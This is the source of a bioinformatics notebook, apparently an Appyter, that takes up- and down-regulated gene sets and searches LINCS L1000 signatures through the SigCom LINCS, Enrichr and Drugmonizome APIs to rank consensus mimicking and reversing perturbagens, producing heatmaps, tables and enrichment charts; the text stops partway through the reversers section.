from matplotlib.ticker import MaxNLocator
METADATA_API = "https://maayanlab.cloud/sigcom-lincs/metadata-api"
DATA_API = "https://maayanlab.cloud/sigcom-lincs/data-api/api/v1"
CLUSTERGRAMMER_URL = 'https://maayanlab.cloud/clustergrammer/matrix_upload/'
S3_PREFIX = "https://appyters.maayanlab.cloud/storage/LDP3Consensus/"
drugmonizome_meta_api = "https://maayanlab.cloud/drugmonizome/metadata-api"
drugmonizome_data_api = "https://maayanlab.cloud/drugmonizome/data-api/api/v1"
enrichr_api = 'https://maayanlab.cloud/Enrichr/'
table = 1
figure = 1
%%appyter code_exec
{% set up_gene_sets = FileField(
name='up_gene_sets',
label='Up Gene-sets',
default='covid19_up.gmt',
section="PRIMARY",
examples={
'covid19_up.gmt': 'https://appyters.maayanlab.cloud/storage/LDP3Consensus/covid19_up.gmt'
}
) %}
{% set down_gene_sets = FileField(
name='down_gene_sets',
label='Down Gene-sets',
default='covid19_down.gmt',
section="PRIMARY",
examples={
'covid19_down.gmt': 'https://appyters.maayanlab.cloud/storage/LDP3Consensus/covid19_down.gmt'
}
) %}
up_gene_sets = {{ up_gene_sets }}
down_gene_sets = {{ down_gene_sets }}
gene_set_direction = None
if up_gene_sets == '':
gene_set_direction = "down"
print("Up gene-sets was not uploaded. Gene-set direction is set to down.")
elif down_gene_sets == '':
gene_set_direction = "up"
print("Down gene-sets was not uploaded. Gene-set direction is set to up.")
%%appyter code_exec
datasets = {{ MultiChoiceField(name='datasets',
label='LINCS Datasets',
description='Select the LINCS datasets to use for the consensus analysis',
default=[
"LINCS L1000 CRISPR Perturbations (2021)",
"LINCS L1000 Chemical Perturbations (2021)",
],
section = 'ENRICHMENT',
choices=[
"LINCS L1000 Antibody Perturbations (2021)",
"LINCS L1000 Ligand Perturbations (2021)",
"LINCS L1000 Overexpression Perturbations (2021)",
"LINCS L1000 CRISPR Perturbations (2021)",
"LINCS L1000 shRNA Perturbations (2021)",
"LINCS L1000 Chemical Perturbations (2021)",
"LINCS L1000 siRNA Perturbations (2021)",
]
)
}}
drugmonizome_datasets = {{ MultiChoiceField(name='drugmonizome_datasets',
description='Select the Drugmonizome libraries to use for the enrichment analysis of the consensus drugs',
label='Drugmonizome Libraries',
default=["L1000FWD_GO_Biological_Processes_drugsetlibrary_up", "L1000FWD_GO_Biological_Processes_drugsetlibrary_down"],
section = 'ENRICHMENT',
choices=[
"L1000FWD_GO_Biological_Processes_drugsetlibrary_up",
"L1000FWD_GO_Biological_Processes_drugsetlibrary_down",
"L1000FWD_GO_Cellular_Component_drugsetlibrary_up",
"L1000FWD_GO_Cellular_Component_drugsetlibrary_down",
"L1000FWD_GO_Molecular_Function_drugsetlibrary_up",
"L1000FWD_GO_Molecular_Function_drugsetlibrary_down",
"L1000FWD_KEGG_Pathways_drugsetlibrary_up",
"L1000FWD_KEGG_Pathways_drugsetlibrary_down",
"L1000FWD_signature_drugsetlibrary_up",
"L1000FWD_signature_drugsetlibrary_down",
"L1000FWD_predicted_side_effects",
"KinomeScan_kinase_drugsetlibrary",
"Geneshot_associated_drugsetlibrary",
"Geneshot_predicted_generif_drugsetlibrary",
"Geneshot_predicted_coexpression_drugsetlibrary",
"Geneshot_predicted_tagger_drugsetlibrary",
"Geneshot_predicted_autorif_drugsetlibrary",
"Geneshot_predicted_enrichr_drugsetlibrary",
"SIDER_indications_drugsetlibrary",
"SIDER_side_effects_drugsetlibrary",
"DrugRepurposingHub_target_drugsetlibrary",
"ATC_drugsetlibrary",
"Drugbank_smallmolecule_target_drugsetlibrary",
"Drugbank_smallmolecule_enzyme_drugsetlibrary",
"Drugbank_smallmolecule_carrier_drugsetlibrary",
"Drugbank_smallmolecule_transporter_drugsetlibrary",
"STITCH_target_drugsetlibrary",
"PharmGKB_OFFSIDES_side_effects_drugsetlibrary",
"CREEDS_signature_drugsetlibrary_down",
"CREEDS_signature_drugsetlibrary_up",
"RDKIT_maccs_fingerprints_drugsetlibrary",
"DrugCentral_target_drugsetlibrary",
"PubChem_fingerprints_drugsetlibrary",
"DrugRepurposingHub_moa_drugsetlibrary",
"PharmGKB_snp_drugsetlibrary"
]
)
}}
transcription_libraries = {{ MultiChoiceField(name='transcription_libraries',
description='Select the Enrichr libraries to use for the enrichment of the consensus genes.',
label='Enrichr Transcription Libraries',
default=[],
section = 'ENRICHMENT',
choices=[
'ARCHS4_TFs_Coexp',
'ChEA_2016',
'ENCODE_and_ChEA_Consensus_TFs_from_ChIP-X',
'ENCODE_Histone_Modifications_2015',
'ENCODE_TF_ChIP-seq_2015',
'Epigenomics_Roadmap_HM_ChIP-seq',
'Enrichr_Submissions_TF-Gene_Coocurrence',
'Genome_Browser_PWMs',
'lncHUB_lncRNA_Co-Expression',
'miRTarBase_2017',
'TargetScan_microRNA_2017',
'TF-LOF_Expression_from_GEO',
'TF_Perturbations_Followed_by_Expression',
'Transcription_Factor_PPIs',
'TRANSFAC_and_JASPAR_PWMs',
'TRRUST_Transcription_Factors_2019'])
}}
pathways_libraries = {{ MultiChoiceField(name='pathways_libraries',
description='Select the Enrichr libraries to use for the enrichment of the consensus genes.',
label='Enrichr Pathway Libraries',
default=[],
section = 'ENRICHMENT',
choices=[
'ARCHS4_Kinases_Coexp',
'BioCarta_2016',
'BioPlanet_2019',
'BioPlex_2017',
'CORUM',
'Elsevier_Pathway_Collection',
'HMS_LINCS_KinomeScan',
'HumanCyc_2016',
'huMAP',
'KEA_2015',
'KEGG_2021_Human',
'KEGG_2019_Mouse',
'Kinase_Perturbations_from_GEO_down',
'Kinase_Perturbations_from_GEO_up',
'L1000_Kinase_and_GPCR_Perturbations_down',
'L1000_Kinase_and_GPCR_Perturbations_up',
'NCI-Nature_2016',
'NURSA_Human_Endogenous_Complexome',
'Panther_2016',
'Phosphatase_Substrates_from_DEPOD',
'PPI_Hub_Proteins',
'Reactome_2016',
'SILAC_Phosphoproteomics',
'SubCell_BarCode',
'Virus-Host_PPI_P-HIPSTer_2020',
'WikiPathway_2021_Human',
'WikiPathways_2019_Mouse'])
}}
ontologies_libraries = {{ MultiChoiceField(name='ontologies_libraries',
description='Select the Enrichr libraries to use for the enrichment of the consensus genes.',
label='Enrichr Ontology Libraries',
default=['GO_Biological_Process_2021'],
section = 'ENRICHMENT',
choices=[
'GO_Biological_Process_2021',
'GO_Cellular_Component_2021',
'GO_Molecular_Function_2021',
'Human_Phenotype_Ontology',
'Jensen_COMPARTMENTS',
'Jensen_DISEASES',
'Jensen_TISSUES',
'MGI_Mammalian_Phenotype_Level_4_2021'])
}}
diseases_drugs_libraries = {{ MultiChoiceField(name='diseases_drugs_libraries',
description='Select the Enrichr libraries to use for the enrichment of the consensus genes.',
label='Enrichr Disease/Drug Libraries',
default=[],
section = 'ENRICHMENT',
choices=[
'Achilles_fitness_decrease',
'Achilles_fitness_increase',
'ARCHS4_IDG_Coexp',
'ClinVar_2019',
'dbGaP',
'DepMap_WG_CRISPR_Screens_Broad_CellLines_2019',
'DepMap_WG_CRISPR_Screens_Sanger_CellLines_2019',
'DisGeNET',
'DrugMatrix',
'DSigDB',
'GeneSigDB',
'GWAS_Catalog_2019',
'LINCS_L1000_Chem_Pert_down',
'LINCS_L1000_Chem_Pert_up',
'LINCS_L1000_Ligand_Perturbations_down',
'LINCS_L1000_Ligand_Perturbations_up',
'MSigDB_Computational',
'MSigDB_Oncogenic_Signatures',
'Old_CMAP_down',
'Old_CMAP_up',
'OMIM_Disease',
'OMIM_Expanded',
'PheWeb_2019',
'Rare_Diseases_AutoRIF_ARCHS4_Predictions',
'Rare_Diseases_AutoRIF_Gene_Lists',
'Rare_Diseases_GeneRIF_ARCHS4_Predictions',
'Rare_Diseases_GeneRIF_Gene_Lists',
'UK_Biobank_GWAS_v1',
'Virus_Perturbations_from_GEO_down',
'Virus_Perturbations_from_GEO_up',
'VirusMINT'])
}}
%%appyter code_exec
alpha = {{FloatField(name='alpha', label='p-value cutoff', default=0.05, section='PARAMETER')}}
min_sigs = {{IntField(name='min_sigs',
label='min_sigs',
                    description='Minimum number of input gene sets sharing the same hit that is required to consider it a consensus signature',
default=2, section='PARAMETER')}}
top_perts = {{IntField(name='top_perts', label='top signatures', default=100, section='PARAMETER')}}
consensus_method = {{ ChoiceField(
name='consensus_method',
label='consensus method',
description='Please select a method for getting the consensus',
default='z-score',
choices={
'z-score': "'z-score'",
'top count': "'count'",
},
section='PARAMETER') }}
```
## Gene Harmonization
To ensure that the gene names are consistent throughout the analysis, the input gene sets are harmonized to NCBI Gene symbols [7-8] using an [in-house gene harmonization module](https://github.com/MaayanLab/maayanlab-bioinformatics).
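As a minimal sketch of the parsing performed below, each GMT line carries a signature id, a description, and a tab-separated gene list; the example line and values are made up:

```python
# Hypothetical GMT line: <signature id> TAB <description> TAB gene1 TAB gene2 ...
line = "sig_1\tan example signature\tSTAT3\tTP53,1.5\tEGFR"
unpacked = line.strip().split("\t")
assert len(unpacked) >= 3  # fewer than three fields is rejected as malformed
sigid, geneset = unpacked[0], unpacked[2:]
# entries may carry comma-separated annotations; only the leading symbol is kept
genes = [entry.split(",")[0] for entry in geneset]
print(sigid, genes)  # sig_1 ['STAT3', 'TP53', 'EGFR']
```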
```
ncbi_lookup = ncbi_genes_lookup('Mammalia/Homo_sapiens')
print('Loaded NCBI genes!')
signatures = {}
if not up_gene_sets == '':
with open(up_gene_sets) as upfile:
for line in upfile:
unpacked = line.strip().split("\t")
if len(unpacked) < 3:
raise ValueError("GMT is not formatted properly, please consult the README of the appyter for proper formatting")
sigid = unpacked[0]
geneset = unpacked[2:]
genes = []
for i in geneset:
gene = i.split(",")[0]
gene_name = ncbi_lookup(gene.upper())
if gene_name:
genes.append(gene_name)
signatures[sigid] = {
"up_genes": genes,
"down_genes": []
}
if not down_gene_sets == '':
with open(down_gene_sets) as downfile:
for line in downfile:
unpacked = line.strip().split("\t")
if len(unpacked) < 3:
raise ValueError("GMT is not formatted properly, please consult the README of the appyter for proper formatting")
sigid = unpacked[0]
geneset = unpacked[2:]
if sigid not in signatures and gene_set_direction == None:
raise ValueError("%s did not match any of the up signatures, make sure that the signature names are the same for both up and down genes"%sigid)
else:
genes = []
for i in geneset:
gene = i.split(",")[0]
                    gene_name = ncbi_lookup(gene.upper())  # uppercase for lookup, matching the up gene-set branch
if gene_name:
genes.append(gene_name)
if sigid in signatures:
signatures[sigid]["down_genes"] = genes
else:
signatures[sigid] = {
"up_genes": [],
"down_genes": genes
}
```
## Input Signatures Metadata
```
enrichr_libraries = transcription_libraries + pathways_libraries + ontologies_libraries + diseases_drugs_libraries
dataset_map = {
"LINCS L1000 Antibody Perturbations (2021)": "l1000_aby",
"LINCS L1000 Ligand Perturbations (2021)": "l1000_lig",
"LINCS L1000 Overexpression Perturbations (2021)": "l1000_oe",
"LINCS L1000 CRISPR Perturbations (2021)": "l1000_xpr",
"LINCS L1000 shRNA Perturbations (2021)": "l1000_shRNA",
"LINCS L1000 Chemical Perturbations (2021)": "l1000_cp",
"LINCS L1000 siRNA Perturbations (2021)": "l1000_siRNA"
}
labeller = {
"LINCS L1000 Antibody Perturbations (2021)": "antibody",
"LINCS L1000 Ligand Perturbations (2021)": "ligand",
"LINCS L1000 Overexpression Perturbations (2021)": "overexpression",
"LINCS L1000 CRISPR Perturbations (2021)": "CRISPR",
"LINCS L1000 shRNA Perturbations (2021)": "shRNA",
"LINCS L1000 Chemical Perturbations (2021)": "chemical",
"LINCS L1000 siRNA Perturbations (2021)": "siRNA"
}
gene_page = {
"LINCS L1000 Ligand Perturbations (2021)",
"LINCS L1000 Overexpression Perturbations (2021)",
"LINCS L1000 CRISPR Perturbations (2021)",
"LINCS L1000 shRNA Perturbations (2021)",
"LINCS L1000 siRNA Perturbations (2021)"
}
drug_page = {
"LINCS L1000 Chemical Perturbations (2021)": "l1000_cp",
}
```
## SigCom LINCS Signature Search
SigCom LINCS provides RESTful APIs for rank enrichment analysis on two-sided (up and down) or one-sided (up-only or down-only) gene sets, returning mimicking and reversing signatures ranked by z-score (for one-sided gene sets) or by z-sum, the absolute value of the sum of the z-scores of the up and down gene sets (for two-sided analysis).
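A toy sketch (with made-up scores) of the classification rule applied to two-sided results in the code below: a signature must be significant in both directions, and the sign of its z-sum decides whether it mimics or reverses the input.

```python
alpha_demo = 0.05  # demo threshold; the notebook uses its `alpha` parameter
api_results = [    # hypothetical API payload, values made up
    {"uuid": "a", "p-up": 0.01, "p-down": 0.02, "z-sum": 4.2},
    {"uuid": "b", "p-up": 0.01, "p-down": 0.03, "z-sum": -3.1},
    {"uuid": "c", "p-up": 0.40, "p-down": 0.01, "z-sum": 5.0},  # filtered out
]
classified = {}
for r in api_results:
    # keep only signatures significant for both the up and the down gene set
    if r["p-up"] < alpha_demo and r["p-down"] < alpha_demo:
        classified[r["uuid"]] = "mimicker" if r["z-sum"] > 0 else "reverser"
print(classified)  # {'a': 'mimicker', 'b': 'reverser'}
```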
```
# functions
def convert_genes(up_genes=[], down_genes=[]):
try:
payload = {
"filter": {
"where": {
"meta.symbol": {"inq": up_genes + down_genes}
}
}
}
timeout = 0.5
for i in range(5):
res = requests.post(METADATA_API + "/entities/find", json=payload)
if res.ok:
break
else:
time.sleep(timeout)
if res.status_code >= 500:
timeout = timeout * 2
else:
raise Exception(res.text)
results = res.json()
up = set(up_genes)
down = set(down_genes)
if len(up_genes) == 0 or len(down_genes) == 0:
converted = {
"entities": [],
}
else:
converted = {
"up_entities": [],
"down_entities": []
}
for i in results:
symbol = i["meta"]["symbol"]
if "entities" in converted:
converted["entities"].append(i["id"])
elif symbol in up:
converted["up_entities"].append(i["id"])
elif symbol in down:
converted["down_entities"].append(i["id"])
return converted
except Exception as e:
print(e)
def signature_search(genes, library):
try:
payload = {
**genes,
"database": library,
"limit": 500,
}
timeout = 0.5
for i in range(5):
endpoint = "/enrich/rank" if "entities" in payload else "/enrich/ranktwosided"
res = requests.post(DATA_API + endpoint, json=payload)
if res.ok:
break
else:
time.sleep(timeout)
if res.status_code >= 500:
timeout = timeout * 2
else:
raise Exception(res.text)
return res.json()["results"]
except Exception as e:
print(e)
def resolve_rank(s, gene_set_direction):
try:
sigs = {}
for i in s:
if i["p-value"] < alpha:
uid = i["uuid"]
direction = "up" if i["zscore"] > 0 else "down"
if direction == gene_set_direction:
i["type"] = "mimicker"
sigs[uid] = i
else:
i["type"] = "reverser"
sigs[uid] = i
payload = {
"filter": {
"where": {
"id": {"inq": list(sigs.keys())}
},
"fields": [
"id",
"meta.pert_name",
"meta.pert_type",
"meta.pert_time",
"meta.pert_dose",
"meta.cell_line",
"meta.local_id"
]
}
}
timeout = 0.5
for i in range(5):
res = requests.post(METADATA_API + "/signatures/find", json=payload)
if res.ok:
break
else:
time.sleep(timeout)
if res.status_code >= 500:
timeout = timeout * 2
else:
raise Exception(res.text)
results = res.json()
signatures = {
"mimickers": {},
"reversers": {}
}
for sig in results:
uid = sig["id"]
scores = sigs[uid]
sig["scores"] = scores
if "pert_name" in sig["meta"]:
local_id = sig["meta"].get("local_id", None)
if scores["type"] == "mimicker":
pert_name = sig["meta"].get("pert_name", None)
local_id = "%s_%s"%(pert_name, local_id.replace("_%s"%pert_name, ""))
signatures["mimickers"][local_id] = {
"pert_name": sig["meta"].get("pert_name", None),
"pert_time": sig["meta"].get("pert_time", None),
"pert_dose": sig["meta"].get("pert_dose", None),
"cell_line": sig["meta"].get("cell_line", None),
"z-score": abs(scores.get("zscore", 0)),
"p-value": scores.get("p-value", 0)
}
elif scores["type"] == "reverser":
pert_name = sig["meta"].get("pert_name", None)
local_id = "%s_%s"%(pert_name, local_id.replace("_%s"%pert_name, ""))
signatures["reversers"][local_id] = {
"pert_name": sig["meta"].get("pert_name", None),
"pert_time": sig["meta"].get("pert_time", None),
"pert_dose": sig["meta"].get("pert_dose", None),
"cell_line": sig["meta"].get("cell_line", None),
"z-score": abs(scores.get("zscore", 0)),
"p-value": scores.get("p-value", 0)
}
return signatures
except Exception as e:
print(e)
def resolve_ranktwosided(s):
try:
sigs = {}
for i in s:
if i['p-down'] < alpha and i['p-up'] < alpha:
uid = i["uuid"]
i['z-sum (abs)'] = abs(i['z-sum'])
if i['z-sum'] > 0:
i["type"] = "mimicker"
sigs[uid] = i
elif i['z-sum'] < 0:
i["type"] = "reverser"
sigs[uid] = i
payload = {
"filter": {
"where": {
"id": {"inq": list(sigs.keys())}
},
"fields": [
"id",
"meta.pert_name",
"meta.pert_type",
"meta.pert_time",
"meta.pert_dose",
"meta.cell_line",
"meta.local_id"
]
}
}
timeout = 0.5
for i in range(5):
res = requests.post(METADATA_API + "/signatures/find", json=payload)
if res.ok:
break
else:
time.sleep(timeout)
if res.status_code >= 500:
timeout = timeout * 2
else:
raise Exception(res.text)
results = res.json()
signatures = {
"mimickers": {},
"reversers": {}
}
for sig in results:
uid = sig["id"]
scores = sigs[uid]
sig["scores"] = scores
if "pert_name" in sig["meta"]:
local_id = sig["meta"].get("local_id", None)
if scores["type"] == "mimicker" and len(signatures["mimickers"]) < 100:
pert_name = sig["meta"].get("pert_name", None)
local_id = "%s_%s"%(pert_name, local_id.replace("_%s"%pert_name, ""))
signatures["mimickers"][local_id] = {
"pert_name": sig["meta"].get("pert_name", None),
"pert_time": sig["meta"].get("pert_time", None),
"pert_dose": sig["meta"].get("pert_dose", None),
"cell_line": sig["meta"].get("cell_line", None),
"z-sum": scores.get("z-sum (abs)", 0)
}
elif scores["type"] == "reverser" and len(signatures["reversers"]) < 100:
pert_name = sig["meta"].get("pert_name", None)
local_id = "%s_%s"%(pert_name, local_id.replace("_%s"%pert_name, ""))
signatures["reversers"][local_id] = {
"pert_name": sig["meta"].get("pert_name", None),
"pert_time": sig["meta"].get("pert_time", None),
"pert_dose": sig["meta"].get("pert_dose", None),
"cell_line": sig["meta"].get("cell_line", None),
"z-sum": scores.get("z-sum (abs)", 0)
}
return signatures
except Exception as e:
print(e)
# enriched = {lib:{"mimickers": {}, "reversers": {}} for lib in datasets}
enriched = {"mimickers": {lib: {} for lib in datasets}, "reversers": {lib: {} for lib in datasets}}
metadata = {}
for k,sig in tqdm(signatures.items()):
try:
time.sleep(0.1)
genes = convert_genes(sig["up_genes"],sig["down_genes"])
if ("entities" in genes and len(genes["entities"]) > 5) or (len(genes["up_entities"]) > 5 and len(genes["down_entities"]) > 5):
for lib in datasets:
library = dataset_map[lib]
s = signature_search(genes, library)
if gene_set_direction == None:
sigs = resolve_ranktwosided(s)
else:
sigs = resolve_rank(s, gene_set_direction)
enriched["mimickers"][lib][k] = sigs["mimickers"]
enriched["reversers"][lib][k] = sigs["reversers"]
for direction, entries in sigs.items():
for label, meta in entries.items():
if label not in metadata:
metadata[label] = {
"pert_name": meta.get("pert_name", None),
"pert_time": meta.get("pert_time", None),
"pert_dose": meta.get("pert_dose", None),
"cell_line": meta.get("cell_line", None),
}
time.sleep(0.1)
except Exception as e:
print(e)
def clustergrammer(df, name, figure, label="Clustergrammer"):
clustergram_df = df.rename(columns={i:"Signature: %s"%i for i in df.columns}, index={i:"Drug: %s"%i for i in df.index})
clustergram_df.to_csv(name, sep="\t")
response = ''
timeout = 0.5
for i in range(5):
try:
res = requests.post(CLUSTERGRAMMER_URL, files={'file': open(name, 'rb')})
if not res.ok:
response = res.text
time.sleep(timeout)
if res.status_code >= 500:
timeout = timeout * 2
else:
clustergrammer_url = res.text.replace("http:","https:")
break
except Exception as e:
response = e
time.sleep(2)
else:
if type(response) == Exception:
raise response
else:
raise Exception(response)
display(IFrame(clustergrammer_url, width="1000", height="1000"))
display(Markdown("**Figure %d** %s [Go to url](%s)"%(figure, label, clustergrammer_url)))
figure += 1
return figure
cmap = sns.cubehelix_palette(50, hue=0.05, rot=0, light=1, dark=0)
def heatmap(df, filename, figure, label, width=15, height=15):
fig = plt.figure(figsize=(width,height))
cg = sns.clustermap(df, cmap=cmap, figsize=(width, height))
cg.ax_row_dendrogram.set_visible(False)
cg.ax_col_dendrogram.set_visible(False)
display(cg)
plt.show()
cg.savefig(filename)
display(Markdown("**Figure %d** %s"%(figure, label)))
figure+=1
return figure
def make_clickable(link):
# target _blank to open new window
# extract clickable text to display for your link
text = link.split('=')[1]
return f'<a target="_blank" href="{link}">{text}</a>'
annot_dict = {}
def bar_chart(enrichment, title=''):
bar_color = 'mediumspringgreen'
bar_color_not_sig = 'lightgrey'
edgecolor=None
linewidth=0
if len(enrichment) > 10:
enrichment = enrichment[0:10]
enrichment_names = [i["name"] for i in enrichment]
enrichment_scores = [i["pval"] for i in enrichment]
plt.figure(figsize=(10,4))
bar_colors = [bar_color if (x < 0.05) else bar_color_not_sig for x in enrichment_scores]
fig = sns.barplot(x=np.log10(enrichment_scores)*-1, y=enrichment_names, palette=bar_colors, edgecolor=edgecolor, linewidth=linewidth)
fig.axes.get_yaxis().set_visible(False)
fig.set_title(title.replace('_',' '),fontsize=20)
fig.set_xlabel('-Log10(p-value)',fontsize=19)
fig.xaxis.set_major_locator(MaxNLocator(integer=True))
fig.tick_params(axis='x', which='major', labelsize=20)
if max(np.log10(enrichment_scores)*-1)<1:
fig.xaxis.set_ticks(np.arange(0, max(np.log10(enrichment_scores)*-1), 0.1))
for ii,annot in enumerate(enrichment_names):
if annot in annot_dict.keys():
annot = annot_dict[annot]
if enrichment_scores[ii] < 0.05:
annot = ' *'.join([annot, str(str(np.format_float_scientific(enrichment_scores[ii],precision=2)))])
else:
annot = ' '.join([annot, str(str(np.format_float_scientific(enrichment_scores[ii],precision=2)))])
title_start= max(fig.axes.get_xlim())/200
fig.text(title_start,ii,annot,ha='left',wrap = True, fontsize = 12)
fig.patch.set_edgecolor('black')
    fig.patch.set_linewidth(2)  # newer Matplotlib requires a numeric linewidth
plt.show()
def get_drugmonizome_plot(consensus, label, figure, dataset):
payload = {
"filter":{
"where": {
"meta.Name": {
"inq": [i.lower() for i in set(consensus['pert name'])]
}
}
}
}
res = requests.post(drugmonizome_meta_api + "/entities/find", json=payload)
entities = {}
for i in res.json():
name = i["meta"]["Name"]
uid = i["id"]
if name not in entities:
entities[name] = uid
query = {
"entities": list(entities.values()),
"limit": 1000,
"database": dataset
}
res = requests.post(drugmonizome_data_api + "/enrich/overlap", json=query)
scores = res.json()["results"]
uids = {i["uuid"]: i for i in scores}
payload = {
"filter":{
"where": {
"id": {
"inq": list(uids.keys())
}
}
}
}
res = requests.post(drugmonizome_meta_api + "/signatures/find", json=payload)
    sigs = res.json()
scores = []
for i in sigs:
score = uids[i["id"]]
scores.append({
"name": i["meta"]["Term"][0]["Name"],
"pval": score["p-value"]
})
scores.sort(key=lambda x: x['pval'])
if len(scores) > 0:
bar_chart(scores, dataset.replace("setlibrary", " set library"))
display(Markdown("**Figure %d** %s"%(figure, label)))
figure += 1
return figure
def get_enrichr_bar(userListId, enrichr_library, figure, label):
query_string = '?userListId=%s&backgroundType=%s'
res = requests.get(
enrichr_api + 'enrich' + query_string % (userListId, enrichr_library)
)
if not res.ok:
raise Exception('Error fetching enrichment results')
data = res.json()[enrichr_library]
scores = [{"name": i[1], "pval": i[2]} for i in data]
scores.sort(key=lambda x: x['pval'])
if len(scores) > 0:
bar_chart(scores, enrichr_library)
display(Markdown("**Figure %d** %s"%(figure, label)))
figure +=1
return figure
def enrichment(consensus, label, figure):
gene_names = [i.upper() for i in set(consensus['pert name'])]
genes_str = '\n'.join(gene_names)
description = label
payload = {
'list': (None, genes_str),
'description': (None, description)
}
res = requests.post(enrichr_api + 'addList', files=payload)
if not res.ok:
raise Exception('Error analyzing gene list')
data = res.json()
shortId = data["shortId"]
userListId = data["userListId"]
display(Markdown("Enrichr Link: https://maayanlab.cloud/Enrichr/enrich?dataset=%s"%shortId))
for d in enrichr_libraries:
l = "Enrichr %s top ranked terms for %s"%(d.replace("_", " "), label)
figure = get_enrichr_bar(userListId, d, figure, l)
return figure
```
## Consensus Analysis
Mimicking and reversing perturbagen scores are organized into a matrix. Depending on the consensus method chosen by the user, consensus signatures are computed either by ranking perturbagens by the sum of their z-scores (or z-sums) across the input signatures, or by counting how many input signatures they appear in.
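As a minimal sketch with made-up scores, the two methods rank a toy score matrix as follows:

```python
import pandas as pd

# Toy score matrix: rows are perturbagens, columns are input signatures.
toy = pd.DataFrame(
    {"sig1": [3.0, 0.0, 1.0], "sig2": [2.0, 4.0, 1.0], "sig3": [0.0, 5.0, 1.0]},
    index=["pertA", "pertB", "pertC"],
)
demo_min_sigs = 2
toy = toy[(toy > 0).sum(1) >= demo_min_sigs]  # require recurrence across inputs
by_zscore = toy.sum(1).sort_values(ascending=False)       # 'z-score' method
by_count = (toy > 0).sum(1).sort_values(ascending=False)  # 'top count' method
print(list(by_zscore.index))  # ['pertB', 'pertA', 'pertC']
print(by_count.index[0])      # pertC recurs in all three inputs
```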
### Mimickers
```
score_field = "z-sum" if gene_set_direction == None else "z-score"
top_n_signatures = 100
direction = "mimickers"
alternate = "mimicking"
for lib in datasets:
library = dataset_map[lib]
display(Markdown("#### Consensus %s %s signatures"%(alternate, labeller[lib])), display_id=alternate+lib)
index = set()
sig_dict = enriched[direction][lib]
for v in sig_dict.values():
index = index.union(v.keys())
df = pd.DataFrame(0, index=index, columns=sig_dict.keys())
for sig_name,v in sig_dict.items():
for local_id, meta in v.items():
df.at[local_id, sig_name] = meta[score_field]
filename = "sig_matrix_%s_%s.tsv"%(library.replace(" ","_"), direction)
df.to_csv(filename, sep="\t")
display(Markdown("Download score matrix for %s %s signatures ([download](./%s))"%
(alternate, labeller[lib], filename)))
if len(df.index) > 1 and len(df.columns) > 1:
top_index = df.index
if len(top_index) > top_n_signatures:
top_index = df[(df>0).sum(1) >= min_sigs].sum(1).sort_values(ascending=False).index
top_index = top_index if len(top_index) <= top_n_signatures else top_index[0:top_n_signatures]
if (df.loc[top_index].sum()>0).sum() < len(df.columns):
blank = df.loc[top_index].sum()==0
blank_indices = [i for i in blank.index if blank[i]]
top_index = list(top_index) + [df[i].idxmax() for i in blank_indices]
top_df = df.loc[top_index]
consensus_norm = quantile_normalize(top_df)
display(Markdown("##### Clustergrammer for %s %s perturbagens"%(alternate, labeller[lib])), display_id="%s-clustergrammer-%s"%(alternate, lib))
        label = "Clustergrammer of consensus %s perturbagens of L1000 %s perturbations (2021) (quantile normalized scores)"%(alternate, labeller[lib])
name = "clustergrammer_%s_%s.tsv"%(library.replace(" ", "_"), direction)
figure = clustergrammer(consensus_norm, name, figure, label)
display(Markdown("#### Heatmap for %s %s perturbagens"%(alternate, labeller[lib])), display_id="%s-heatmap-%s"%(alternate, lib))
        label = "Heatmap of consensus %s perturbagens of L1000 %s perturbations (2021) (quantile normalized scores)"%(alternate, labeller[lib])
name = "heatmap_%s_%s.png"%(library.replace(" ", "_"), direction)
figure = heatmap(consensus_norm, name, figure, label)
df = df[(df>0).sum(1) >= min_sigs]
if consensus_method == 'z-score':
df = df.loc[df.sum(1).sort_values(ascending=False).index[0:top_perts]]
else:
df = df.loc[(df > 0).sum(1).sort_values(ascending=False).index[0:top_perts]]
if lib in gene_page:
stat_df = pd.DataFrame(index=df.index, columns=["pert name", "pert time", "cell line", "count", "z-sum", "Enrichr gene page"])
stat_df['count'] = (df > 0).sum(1)
# Compute zstat and p value
stat_df["z-sum"] = df.sum(1)
for i in stat_df.index:
stat_df.at[i, "pert name"] = metadata[i]["pert_name"]
stat_df.at[i, "pert time"] = metadata[i]["pert_time"]
stat_df.at[i, "cell line"] = metadata[i]["cell_line"]
stat_df['Enrichr gene page'] = ["https://maayanlab.cloud/Enrichr/#find!gene=%s"%i for i in stat_df["pert name"]]
stat_df = stat_df.fillna("-")
filename = "sig_stat_%s_%s.tsv"%(lib.replace(" ","_"), direction)
stat_df.to_csv(filename, sep="\t")
stat_df['Enrichr gene page'] = stat_df['Enrichr gene page'].apply(make_clickable)
stat_html = stat_df.head(25).to_html(escape=False)
display(HTML(stat_html))
else:
stat_df = pd.DataFrame(index=df.index, columns=["pert name", "pert dose", "pert time", "cell line", "count", "z-sum"])
stat_df['count'] = (df > 0).sum(1)
stat_df["z-sum"] = df.sum(1)
for i in stat_df.index:
stat_df.at[i, "pert name"] = metadata[i]["pert_name"]
stat_df.at[i, "pert dose"] = metadata[i]["pert_dose"]
stat_df.at[i, "pert time"] = metadata[i]["pert_time"]
stat_df.at[i, "cell line"] = metadata[i]["cell_line"]
stat_df = stat_df.fillna("-")
filename = "sig_stat_%s_%s.tsv"%(library.replace(" ","_"), direction)
stat_df.to_csv(filename, sep="\t")
display(stat_df.head(25))
    display(Markdown("**Table %d** Top 25 consensus %s %s signatures ([download](./%s))"%
(table, alternate, labeller[lib], filename)))
table+=1
if len(set(stat_df["pert name"])) > 5:
if lib in drug_page:
display(Markdown("#### Drugmonizome enrichment analysis for the consensus %s %s perturbagens"% (alternate, labeller[lib])))
for d in drugmonizome_datasets:
label = "%s top ranked enriched terms for %s %s perturbagens"%(d.replace("_", " "), alternate, labeller[lib])
figure = get_drugmonizome_plot(stat_df, label, figure, d)
elif lib in gene_page:
display(Markdown("#### Enrichr link to analyze enriched terms for the consensus %s %s perturbagens"% (alternate, labeller[lib])))
label = "%s L1000 %s perturbagens"%(alternate, labeller[lib])
figure = enrichment(stat_df, label, figure)
```
### Reversers
```
direction = "reversers"
alternate = "reversing"
for lib in datasets:
library = dataset_map[lib]
display(Markdown("#### Consensus %s %s signatures"%(alternate, labeller[lib])), display_id=alternate+lib)
index = set()
sig_dict = enriched[direction][lib]
for v in sig_dict.values():
index = index.union(v.keys())
df = pd.DataFrame(0, index=index, columns=sig_dict.keys())
for sig_name,v in sig_dict.items():
for local_id, meta in v.items():
df.at[local_id, sig_name] = meta[score_field]
filename = "sig_matrix_%s_%s.tsv"%(library.replace(" ","_"), direction)
df.to_csv(filename, sep="\t")
